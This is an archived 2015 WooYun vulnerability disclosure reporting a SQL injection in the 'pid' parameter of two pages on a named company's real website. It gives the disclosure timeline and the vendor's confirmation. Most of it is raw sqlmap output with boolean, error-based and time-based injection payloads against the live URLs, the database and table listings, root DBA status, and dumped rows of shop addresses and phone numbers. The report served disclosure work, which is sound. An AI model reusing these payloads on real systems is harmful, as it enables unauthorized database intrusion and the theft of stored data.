乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-17: 细节已通知厂商并且等待厂商处理中 2015-08-18: 厂商已经确认,细节仅向厂商公开 2015-08-28: 细节向核心白帽子及相关领域专家公开 2015-09-07: 细节向普通白帽子公开 2015-09-17: 细节向实习白帽子公开 2015-10-02: 细节向公众公开
华润集团麾下某公司网站存在SQL注入漏洞。
注入点:
http://www.chinawufeng.com/cold.php?pid=13
http://www.chinawufeng.com/fast.php?pid=25
sqlmap identified the following injection point(s) with a total of 203 HTTP(s) requests:---Parameter: pid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pid=13' AND 9779=9779 AND 'KmPx'='KmPx Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: pid=13' AND (SELECT 8320 FROM(SELECT COUNT(*),CONCAT(0x7171767171,(SELECT (ELT(8320=8320,1))),0x7170627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eRRc'='eRRc Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: pid=13' AND SLEEP(5) AND 'WDGL'='WDGL---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.4.4back-end DBMS: MySQL 5.0available databases [6]:[*] chinawufeng[*] information_schema[*] mysql[*] performance_schema[*] test[*] wechat
sqlmap resumed the following injection point(s) from stored session:---Parameter: pid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pid=13' AND 9779=9779 AND 'KmPx'='KmPx Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: pid=13' AND (SELECT 8320 FROM(SELECT COUNT(*),CONCAT(0x7171767171,(SELECT (ELT(8320=8320,1))),0x7170627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eRRc'='eRRc Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: pid=13' AND SLEEP(5) AND 'WDGL'='WDGL---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.4.4back-end DBMS: MySQL 5.0current user: 'root@localhost'current user is DBA: Truesqlmap resumed the following injection point(s) from stored session:---
Parameter: pid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pid=13' AND 9779=9779 AND 'KmPx'='KmPx Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: pid=13' AND (SELECT 8320 FROM(SELECT COUNT(*),CONCAT(0x7171767171,(SELECT (ELT(8320=8320,1))),0x7170627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eRRc'='eRRc Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: pid=13' AND SLEEP(5) AND 'WDGL'='WDGL---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.4.4back-end DBMS: MySQL 5.0Database: chinawufeng[18 tables]+--------------------+| lbcms_about || lbcms_active || lbcms_admin || lbcms_applications || lbcms_buy || lbcms_cdrink || lbcms_channel || lbcms_class || lbcms_config || lbcms_down || lbcms_fast || lbcms_field || lbcms_rotpic || lbcms_ticket || ska_comments || ska_users || wtest_messagequeue || wtest_users |+--------------------+
--部分数据web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.4.4back-end DBMS: MySQL 5.0Database: chinawufengTable: lbcms_buy[31 entries]+--------------------------+---------+---------------+| addr | content | phone |+--------------------------+---------+---------------+| 三门光明路63#(东方百货旁) | NULL | 0576-83337177 || 上塘路772号(舟山路口公交站) | NULL | 0571-88282141 || 上虞百官街道横利新村西二区1幢101-102号 | NULL | 0575-82135386 || 上陡门5组团4幢106-107号(人才大厦对面) | NULL | 0577-88324633 || 下沙25号大街284号伊萨卡小区 | NULL | 0571-86906576 || 下沙文苑风情2幢商铺2-3 | NULL | 0571-86924476 || 东港二村 | NULL | 0512-67489177 || 东阳市双岘路128号 | NULL | 0579-86637490 || 临安市石镜街699号 | NULL | 0571-63961373 || 临平南兴路49号 | NULL | 0571-86220900 || 临平梅堰路12-3 | NULL | 0571-86161512 || 临海市区水云北路129号 | NULL | 0576-85156668 || 丽水中山街295号 | NULL | 0578-2132716 || 丽水市大众路98号 | NULL | 0578-2127834 || 丽水解放街306号 | NULL | 0578-2151715 || 乐清市乐成镇建设西路103-105号 | NULL | 0577-62557279 || 乐清市柳市镇后市街109号 | NULL | 0577-62776269 || 乐清市虹桥镇虹河东路9号 | NULL | 0577-62373340 || 乐购旁再行里42号(开元职高对面) | NULL | 0571-85372877 || 五台山路江都路交叉口云川农贸市场 | NULL | 13082567358 || 体育场西路93号 | NULL | 0579-84137486 || 余姚市阳明东路213号 | NULL | 0574-62681596 || 全坊巷43号 | NULL | 0577-88254176 || 北仑横河路196号 | NULL | 0574-86833395 || 千岛湖镇南山大街605-607号 | NULL | 0571-65067327 || 华星路211号(公益中学对面) | NULL | 0571-88930854 || 古河巷87-89号(锦绣新村10幢) | NULL | 0571-88063211 || 台州临海市台招路12号 | NULL | 0576-85222190 || 台州市万昌中路323号 | NULL | 0576-86028065 || 台州市椒江区东海大道542号 | NULL | 0576-88518088 || 台州市椒江区岩屿路44-45号 | NULL | 0576-88816517 |+--------------------------+---------+---------------+
危害等级:高
漏洞Rank:12
确认时间:2015-08-18 15:25
感谢提交
暂无